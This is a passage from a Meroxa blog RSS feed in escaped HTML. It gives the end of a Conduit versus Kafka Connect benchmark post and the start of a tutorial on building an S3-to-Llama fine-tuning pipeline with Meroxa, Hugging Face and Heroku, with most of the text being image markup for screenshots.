        src=&quot;/static/904be5aa8ef32385fb19bed11b3c0475/5a190/screenshot-2025-04-04-at-15.15.14.png&quot;
        srcset=&quot;/static/904be5aa8ef32385fb19bed11b3c0475/772e8/screenshot-2025-04-04-at-15.15.14.png 200w,
/static/904be5aa8ef32385fb19bed11b3c0475/e17e5/screenshot-2025-04-04-at-15.15.14.png 400w,
/static/904be5aa8ef32385fb19bed11b3c0475/5a190/screenshot-2025-04-04-at-15.15.14.png 800w,
/static/904be5aa8ef32385fb19bed11b3c0475/c1b63/screenshot-2025-04-04-at-15.15.14.png 1200w,
/static/904be5aa8ef32385fb19bed11b3c0475/29007/screenshot-2025-04-04-at-15.15.14.png 1600w,
/static/904be5aa8ef32385fb19bed11b3c0475/d61c2/screenshot-2025-04-04-at-15.15.14.png 1800w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/89b936c8bc6789b3dc69adefe6836ee5/11d70/screenshot-2025-04-04-at-15.15.27.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 62%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAABYlAAAWJQFJUiTwAAACDElEQVR42oVTz2vUQBTe/8GTUARpKRZvihZ6EkE8eXIFPRV7EimC7akiFBH1IKJIL4IHT7YIrkVbYSn2X7CIPXgQrBHdbJLdJJNMJr/m881sJmSh4oMhmffefPN9771p5XmOsixRFIX+NpeUEmEYYuj7CIIAjEXkA0qV28hXZ5UxxtBSjsMso5y+n8EPhmC/LPQtC47rgsexvkibLPUy+5hiLbURQmgG6l8zo5XmJbxAgEcM+XCIhIWIOUcURZpRDUpmGKpYy0gzzv9apSj7ugd/5RbY2mPI6qxmeKjkypd+2UPw8C7i9VeAYVQdTrpb6M0chdu+CJll45LTNNWSdVloL6lROqGzgd+TR+DNX9YsFKSJJbtd2HMn4S1cQUnndb6S7DgOsuoGY0YC395E7+w0BovXa9YyHwHzTwQ4e2J0WZOhbdu6KWPSjaytd+idmsTg5nwNaGJi9x+ASqKaRdNlSWNw0BP47AA/Xr+Fc2YKHgEWWqrEN0tg5zuwv/4R7twMXAIsiNBYl2upVd1X38SYWgWe394APz0BZ+EaDfIo70EnxrEV4NHye0Szx+FcvTTO0ACqxgiRUv1SPPsQ4MLTDC/vdRC0z8G+s4SEJ3Rjhhddij0RWLu/Da99HvbSDQgCyqkUjF5VDdh8eiIrwZIC9h8bOT2nIknqmBr4QcDx88BC2O9DktzmYP8FMoRzCDJ3eGsAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;RAM usage&quot;
        title=&quot;&quot;
        src=&quot;/static/89b936c8bc6789b3dc69adefe6836ee5/5a190/screenshot-2025-04-04-at-15.15.27.png&quot;
        srcset=&quot;/static/89b936c8bc6789b3dc69adefe6836ee5/772e8/screenshot-2025-04-04-at-15.15.27.png 200w,
/static/89b936c8bc6789b3dc69adefe6836ee5/e17e5/screenshot-2025-04-04-at-15.15.27.png 400w,
/static/89b936c8bc6789b3dc69adefe6836ee5/5a190/screenshot-2025-04-04-at-15.15.27.png 800w,
/static/89b936c8bc6789b3dc69adefe6836ee5/c1b63/screenshot-2025-04-04-at-15.15.27.png 1200w,
/static/89b936c8bc6789b3dc69adefe6836ee5/29007/screenshot-2025-04-04-at-15.15.27.png 1600w,
/static/89b936c8bc6789b3dc69adefe6836ee5/11d70/screenshot-2025-04-04-at-15.15.27.png 1802w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Conduit’s CPU usage is higher by around 13% in snapshots and 28% in CDC. When it comes to memory usage, we see a bigger gap, this time with Conduit using less resources (390 MB or 68%) than Kafka Connect (1200 MB).&lt;/p&gt;
&lt;p&gt;While the snapshot message rates are pretty close (Conduit’s message rate is about 9% higher), we see a greater gap in CDC, where Conduit’s message rate is about 52% higher. We believe this is a significant result, given that pipelines will spend most of their time in CDC mode (a snapshot might take days, and the rest of a pipeline’s life, even after restarts, will be spent on capturing data changes).&lt;/p&gt;
&lt;h2&gt;Hello!&lt;/h2&gt;
&lt;p&gt;You might want to know more about these benchmarks, have ideas on how to tweak pipelines, or have found a mistake in how we ran the tests. If so, drop us a “hello!” on our &lt;a href=&quot;http://discord.meroxa.com/&quot;&gt;Discord channel&lt;/a&gt; or open a &lt;a href=&quot;https://github.com/ConduitIO/conduit/discussions&quot;&gt;GitHub discussion&lt;/a&gt;!&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Streamlining AI: How to Fine-Tune Llama in Real Time with Meroxa, Hugging Face, and Heroku]]></title><description><![CDATA[Learn how to build a fully automated, production-ready pipeline that transforms raw S3 files into a fine-tuned Llama model powering real-time recommendations. This step-by-step guide covers data preprocessing with Meroxa, training with Hugging Face, and deploying with Docker and Heroku.]]></description><link>https://meroxa.com/blog/streamlining-ai-how-to-fine-tune-llama-in-real-time-with-meroxa-hugging-face-and-heroku</link><guid isPermaLink="false">https://meroxa.com/blog/streamlining-ai-how-to-fine-tune-llama-in-real-time-with-meroxa-hugging-face-and-heroku</guid><dc:creator><![CDATA[DeVaris Brown]]></dc:creator><pubDate>Wed, 02 Apr 2025 18:10:00 GMT</pubDate><content:encoded>&lt;p&gt;Building AI-powered applications can be challenging, especially when dealing with raw data that needs extensive preprocessing before it can be used for training machine learning models. If you&apos;ve ever tried to set up an end-to-end pipeline for fine-tuning a language model like Llama, you know the headaches involved in data preparation, model training, and deployment.&lt;/p&gt;
&lt;p&gt;In this comprehensive guide, we&apos;ll tackle a common challenge faced by ML engineers and data scientists:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Problem Statement:&lt;/strong&gt; Imagine you have a collection of raw files sitting in an S3 bucket. Your goal is to build a production-ready system that can automatically convert these files into JSONL format, ensure data consistency through transformations, fine-tune a Llama language model, and deploy an API for real-time recommendations. The catch? Everything needs to be automated and production-ready.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;We&apos;ll show you how to solve this using a powerful combination of tools: Meroxa for handling data streaming and transformations, Hugging Face&apos;s Trainer API for model fine-tuning, and Docker/Heroku for deployment. By the end of this guide, you&apos;ll have a robust, automated pipeline that takes you from raw data to serving predictions in production.&lt;/p&gt;
&lt;hr&gt;
&lt;h2&gt;Overview Diagram: Solution Architecture&lt;/h2&gt;
&lt;p&gt;The following Mermaid diagram outlines the overall solution:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/858e2bf2f8ee4c87e431d837717246d2/772aa/mermaid-diagram-2025-04-01-172345.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 69.5%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAOCAYAAAAvxDzwAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA4klEQVR42qWTwQ6CQAxE0QMaQQVRFmRxEY0goiD6/782dhuv4qGHSSbN9qVNZ53pXOGXJjMF109hyopUw/VSro31OOPAmIHZ4YLMXMgnUqCCH2js8zPLIy8CWu11ieH1ZqX6iH/v/wJXmxwqK0lnLMmLgXFywHN4ox8G7MiLgcHOQNNBclMh2AqB9gDhF6iLiuGiozgUG2+doW461LcOC/I2SqIc+qHmUJvyyl4EdNwYW1XgenugaXtEccFTiyZchjlSCrX9LTY2wpUVQTSvW5yaL1DJV27vPdrHE5EyXBvr+QAwbUbL3t5XDgAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;End to end solution workflow diagram&quot;
        title=&quot;&quot;
        src=&quot;/static/858e2bf2f8ee4c87e431d837717246d2/5a190/mermaid-diagram-2025-04-01-172345.png&quot;
        srcset=&quot;/static/858e2bf2f8ee4c87e431d837717246d2/772e8/mermaid-diagram-2025-04-01-172345.png 200w,
/static/858e2bf2f8ee4c87e431d837717246d2/e17e5/mermaid-diagram-2025-04-01-172345.png 400w,
/static/858e2bf2f8ee4c87e431d837717246d2/5a190/mermaid-diagram-2025-04-01-172345.png 800w,
/static/858e2bf2f8ee4c87e431d837717246d2/c1b63/mermaid-diagram-2025-04-01-172345.png 1200w,
/static/858e2bf2f8ee4c87e431d837717246d2/29007/mermaid-diagram-2025-04-01-172345.png 1600w,
/static/858e2bf2f8ee4c87e431d837717246d2/772aa/mermaid-diagram-2025-04-01-172345.png 2042w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;This diagram shows how raw files are ingested from S3, converted to JSONL using a custom processor, then further transformed, stored back in S3, and used to trigger a remote training job. The resulting fine-tuned model is then served via a recommendations API.&lt;/p&gt;
&lt;hr&gt;
&lt;h2&gt;Prerequisites &amp;#x26; Environment Setup&lt;/h2&gt;
&lt;p&gt;Before you begin, ensure you have:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Python Environment:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;Install &lt;a href=&quot;https://www.python.org/downloads/&quot;&gt;Python 3.8+&lt;/a&gt;.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Create and activate a virtual environment:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/862478d4df01d8160ba7c6d27d2e91d7/c45c7/v-env.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 33%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAABQklEQVR42p3MzUoCURgG4LmOSp3//1FTsFXdiBVUJkGFQYVW5iKF0lpqiyyi0kTLQQsKf9pE6CXNbt5OMyLRqlo8vN/5OO9HPXY+0OwN0ewMYHb/qT+0zd4Ajdd3i7qomjg6PkMmX8B+9uTvcnmkcwW7fN9C/YUcTB5mMad5EJhlQItesOwUWN4DjveCF1xf80/8KAXBB5qesHczWfdgInmAsK4gEjQQ9muYCQUQmTYQNBRomgCV0HQRuiGO5+90Q4IoMfZWKo1qu29RG9spqLwPhizAT4SCKgK6RGYeisiQzzQUhYGispBkBjKhKKyTsrPnwHGT9ubOHirtnkXli5eIrSewEFtDdHkV0aWYm8T8Stw1eju7sbhjkfRI3z4tXaHS6lrUrdlBufaE85sHFK8bI/VfK5Feuda271pd1J7frE8AXzviQmNtUAAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Python virtual environment&quot;
        title=&quot;&quot;
        src=&quot;/static/862478d4df01d8160ba7c6d27d2e91d7/5a190/v-env.png&quot;
        srcset=&quot;/static/862478d4df01d8160ba7c6d27d2e91d7/772e8/v-env.png 200w,
/static/862478d4df01d8160ba7c6d27d2e91d7/e17e5/v-env.png 400w,
/static/862478d4df01d8160ba7c6d27d2e91d7/5a190/v-env.png 800w,
/static/862478d4df01d8160ba7c6d27d2e91d7/c1b63/v-env.png 1200w,
/static/862478d4df01d8160ba7c6d27d2e91d7/c45c7/v-env.png 1346w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Install required packages:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/3c890e4dfc318ea71bb89123fa3da8dc/62da8/packages.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 32.49999999999999%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAABR0lEQVR42p2MTUvCcBzH90KCgqbb1M0tNy1WOwQdOvcaNKG0SDsUHutUkYdmkj35EOimwcBmIBgpHeoVBQ6+/Z0rpVsdPv/f5//9PVCG3R+anQGhP2zY/4TsGs+DT6v3DqrefoFeMXFarCBPOL/6O/lSFZdl07F6H6CumzY21laxrvnAaQxYhgYX9IHl6DEBeuLTmZdzQT9o3yxUTXUa9iuoQrUFTZUhhWYgyAHwPIMQ74MQ5ggscb/rvMC4zgusN+P3KgOOm4cSk51yswNKL5tYXolBCMwhEglDWghBlIJQoqLL6K9EJciKSPJxb5yJiMjCz/ySuujcGU+gSnULueMzbGcPkdzJIpHKYjOdITWDeGoPCc9d0hPiXpbc3cdW5gC5oxPnweqCqpHnllwu1h5RuDdw4aF7TLv+q/9dR7s3Rttpdd/wBUlERWgo/YRPAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Python required packages&quot;
        title=&quot;&quot;
        src=&quot;/static/3c890e4dfc318ea71bb89123fa3da8dc/5a190/packages.png&quot;
        srcset=&quot;/static/3c890e4dfc318ea71bb89123fa3da8dc/772e8/packages.png 200w,
/static/3c890e4dfc318ea71bb89123fa3da8dc/e17e5/packages.png 400w,
/static/3c890e4dfc318ea71bb89123fa3da8dc/5a190/packages.png 800w,
/static/3c890e4dfc318ea71bb89123fa3da8dc/c1b63/packages.png 1200w,
/static/3c890e4dfc318ea71bb89123fa3da8dc/62da8/packages.png 1262w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Meroxa Account &amp;#x26; S3 Setup:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Sign up and log in to &lt;a href=&quot;https://meroxa.com/&quot;&gt;Meroxa&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;Configure two AWS S3 buckets: one for raw data (e.g., &lt;code class=&quot;language-text&quot;&gt;raw-data-bucket&lt;/code&gt;) and one for processed data (e.g., &lt;code class=&quot;language-text&quot;&gt;processed-data-bucket&lt;/code&gt;).&lt;/li&gt;
&lt;li&gt;Ensure your environment (or cloud server) has proper AWS credentials or IAM roles to access these buckets.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Docker &amp;#x26; Heroku CLI:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Install &lt;a href=&quot;https://www.docker.com/get-started&quot;&gt;Docker&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;Install the &lt;a href=&quot;https://devcenter.heroku.com/articles/heroku-cli&quot;&gt;Heroku CLI&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;
&lt;h2&gt;Step 1. Setting Up a Single Meroxa Pipeline&lt;/h2&gt;
&lt;p&gt;Meroxa pipelines are defined via a YAML configuration file that specifies sources, processors, and destinations. In this pipeline, we:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Ingest Raw Files:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Pull raw files (e.g., CSV, text files) from an S3 bucket.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Convert to JSONL:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Use a custom processor (&lt;code class=&quot;language-text&quot;&gt;convert_to_jsonl.js&lt;/code&gt;) to convert these raw files into JSONL format.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Custom Transformation:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Apply a second custom processor (&lt;code class=&quot;language-text&quot;&gt;transform_data.js&lt;/code&gt;) to further standardize each record (e.g., converting all keys to lowercase).&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Store &amp;#x26; Trigger:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Write the processed JSONL data back to an S3 bucket and trigger an HTTP endpoint (via a &lt;code class=&quot;language-text&quot;&gt;webhook.http&lt;/code&gt; processor) to start a remote fine-tuning job.&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h3&gt;Meroxa Pipeline YAML&lt;/h3&gt;
&lt;p&gt;Create a file named &lt;code class=&quot;language-text&quot;&gt;pipeline.yaml&lt;/code&gt; with the following content:&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/f7d72a3fe956988b2a150fb6daf435cc/0f586/starting-pipeline.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 154%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAfCAYAAADnTu3OAAAACXBIWXMAAAsTAAALEwEAmpwYAAADkUlEQVR42qWVS28TVxiG/QdYlEWInevM2HP13Gc8HtsJlsqOIBIHJU5LEkDcUnXVRRdsWMCCDeoiC3YFJaJBgShEkRIgXARI0Kq/w/0Vlt9+54ytNuAQYhavvuPFef1+53vOmdT6ztvmxt4HbOz9hc0XH7G514Ne/tnaevM31nffNlKPn71v3rrzG5Z+uoKLPy9h8co1XLh6/at18doSzl+63Lp9dxnrO+8aqTVKWK//ACt3HIIxiJGhNIaGT2C4raG2hke6a1RIo6/vWGv2/Dwebr9upFaevmjO/LgAxygi8iM4to68meMyTTmRJUM3ctD07GfSDRmiNNiqLyzi/uOdf7hhbWYWhmKgXIxRjCyEoc7lejJcV4EfKDDyEmRFhKLul6plKWWmNUMJE8NNMpydhSAMIHRjxMUI49UYlq0hJwvcJKcInxkdYljH6GgaBb+MUliF61hQVWpRk9qbxKMbjoz2w7J0BJ4H33MR+gGdn0pnlOUpu7V7qKFpaomh68BxZUSRjkJBo/MkY53OsBdD33O4HEejc1T4hE2a+EFtH96y78KjhKbFMBE5GrIi9NayZRmUzuMqBAUEbkA8ymQqtbn7r6qaxKuez0EUBznYnximqTUFNrVqEzJ5WhuGzIdi0CYmts6318yYVbYnmx3qZpgkjMICioUYYUBJA52fXdLyfrF2WWVJCbkuHAoZAruIsUoJ358aw8lqiSbs8A0HMXg42F4JcVClCVvQNQUKH4TQm2FnygzqgInAtiyNPwqd9nrExuPYeJ5CLettqRxuxuOn+BwJbAY1f8r4VKWucH/ZcB/YDBnpf2ALR796CdgOBzv0E7AZZ+zV0Wgjq2pbjMlk/cWEKpnZ1K5OcKt8IB2g2TqpJJ0BLvP0zFToZihnJc5h6EX8thh5md8WRZW6At1Zq/qBHPbDtmzE4Tg9Wy7i2ESl4vAnzLZzvYDdT3dXpQ9Vhc4v5K0mCb8FbNPiCYuRh3LZRrliw/eVXhOmKSF94Vx6HMJS8pJYCh/CkRNO1+cgiBlK4qBUqGJ8rEiPg4dqNYDnG3wwbGM3aZ3v8vxCYri69bI5ee4cMunvIOcE6KpKVeR/wCRKA2zDgcpmh5HJHG9Nz83hwZNnieEvN27izFQNE7UaTk+excTkFCbY76/Qmdo01anWrzdvY2XzeSP1x/br5oMnu7i3uoHl3x/1pHsrG63Vp3tY237V+BfgB1j3LNDOGAAAAABJRU5ErkJggg==&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Meroxa pipeline.yaml with placeholders&quot;
        title=&quot;&quot;
        src=&quot;/static/f7d72a3fe956988b2a150fb6daf435cc/5a190/starting-pipeline.png&quot;
        srcset=&quot;/static/f7d72a3fe956988b2a150fb6daf435cc/772e8/starting-pipeline.png 200w,
/static/f7d72a3fe956988b2a150fb6daf435cc/e17e5/starting-pipeline.png 400w,
/static/f7d72a3fe956988b2a150fb6daf435cc/5a190/starting-pipeline.png 800w,
/static/f7d72a3fe956988b2a150fb6daf435cc/c1b63/starting-pipeline.png 1200w,
/static/f7d72a3fe956988b2a150fb6daf435cc/0f586/starting-pipeline.png 1498w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Instructions:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Replace &lt;code class=&quot;language-text&quot;&gt;raw-data-bucket&lt;/code&gt; and &lt;code class=&quot;language-text&quot;&gt;processed-data-bucket&lt;/code&gt; with your actual S3 bucket names.&lt;/li&gt;
&lt;li&gt;Upload this YAML via the Meroxa dashboard by navigating to &lt;strong&gt;Pipelines → Create Pipeline&lt;/strong&gt; and pasting or uploading the file. Your pipeline should look like this in the dashboard:&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/a4aa613fd43fd55e735731a6961e66d7/27f8b/screenshot-2025-04-01-at-12.00.35%E2%80%AFpm.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 83.50000000000001%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAARCAYAAADdRIy+AAAACXBIWXMAABYlAAAWJQFJUiTwAAAB1klEQVR42qWUyXaiUBRF8wFJjCKgFvYBbJBONIiITVJqYVMmJsYkk3xA/f/01H0MkkFRK7IyOOvBW9zDPpf7OLvKqYhTvqRBurZRVBwIZT2SWNEhyV3Y3gJ8UUNKVP6pO4szS5EaTQfd4QK9IESt7aLSvKF1AJPMXt7/oFCzcCnIpxkyFYiE0RXaHkr2FEUmYwyJ9sSqAU5qn07IlCk0wf1oIUOFHMXLUuQ0u6f9LO2l843Yuv8afogo0tELGtH1V89/acj6lKsYqFP0uJ4lNmR9YtFFipz6NmH+MzKX/0bkNBkJZQN82YTQ6ENoDZCjyGLLhVgzkSNxUuu0r8xoLngVluthvd/CmT3CWx5gBVsYpN6Y1sES2SSDfSEo0ByfDF8wDd8w/XWkASfzYIPB7AHWcHW6ISM85xWYRLg7PMCfP5P2EZXtr9Cf/KbTwgjbCQl7Ppa7RwSLI0bzJ9ijNbqjDW6m90QYJjvLbN4Uc4z57h2361dMwmNkwgy9uz2RhskIU6IM2QwwWhzgzu6j3jFDJt1dQuv/BF/Skp3luupAtQIqvo3WemcIWfcx377CnWyQoWG/SvL7KlU7UPQh9XKG646HotpDleaxP16haU9o6ON/Dn8BuJ7d/xg2PiUAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Meroxa pipeline dashboard visualization&quot;
        title=&quot;&quot;
        src=&quot;/static/a4aa613fd43fd55e735731a6961e66d7/5a190/screenshot-2025-04-01-at-12.00.35%E2%80%AFpm.png&quot;
        srcset=&quot;/static/a4aa613fd43fd55e735731a6961e66d7/772e8/screenshot-2025-04-01-at-12.00.35%E2%80%AFpm.png 200w,
/static/a4aa613fd43fd55e735731a6961e66d7/e17e5/screenshot-2025-04-01-at-12.00.35%E2%80%AFpm.png 400w,
/static/a4aa613fd43fd55e735731a6961e66d7/5a190/screenshot-2025-04-01-at-12.00.35%E2%80%AFpm.png 800w,
/static/a4aa613fd43fd55e735731a6961e66d7/c1b63/screenshot-2025-04-01-at-12.00.35%E2%80%AFpm.png 1200w,
/static/a4aa613fd43fd55e735731a6961e66d7/29007/screenshot-2025-04-01-at-12.00.35%E2%80%AFpm.png 1600w,
/static/a4aa613fd43fd55e735731a6961e66d7/27f8b/screenshot-2025-04-01-at-12.00.35%E2%80%AFpm.png 1730w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;h2&gt;Step 2. Writing Custom Processors for Meroxa&lt;/h2&gt;
&lt;p&gt;Meroxa requires custom processors to be written in JavaScript. We need three processors for our workflow.&lt;/p&gt;
&lt;h3&gt;2.1. JSONL Conversion Processor (&lt;code class=&quot;language-text&quot;&gt;convert_to_jsonl.js&lt;/code&gt;)&lt;/h3&gt;
&lt;p&gt;This processor converts a raw record into a JSONL-formatted string before it’s stored in S3.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/d7b51cd2d1fb8993f689c57adc8e16bd/b1001/jsonl.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
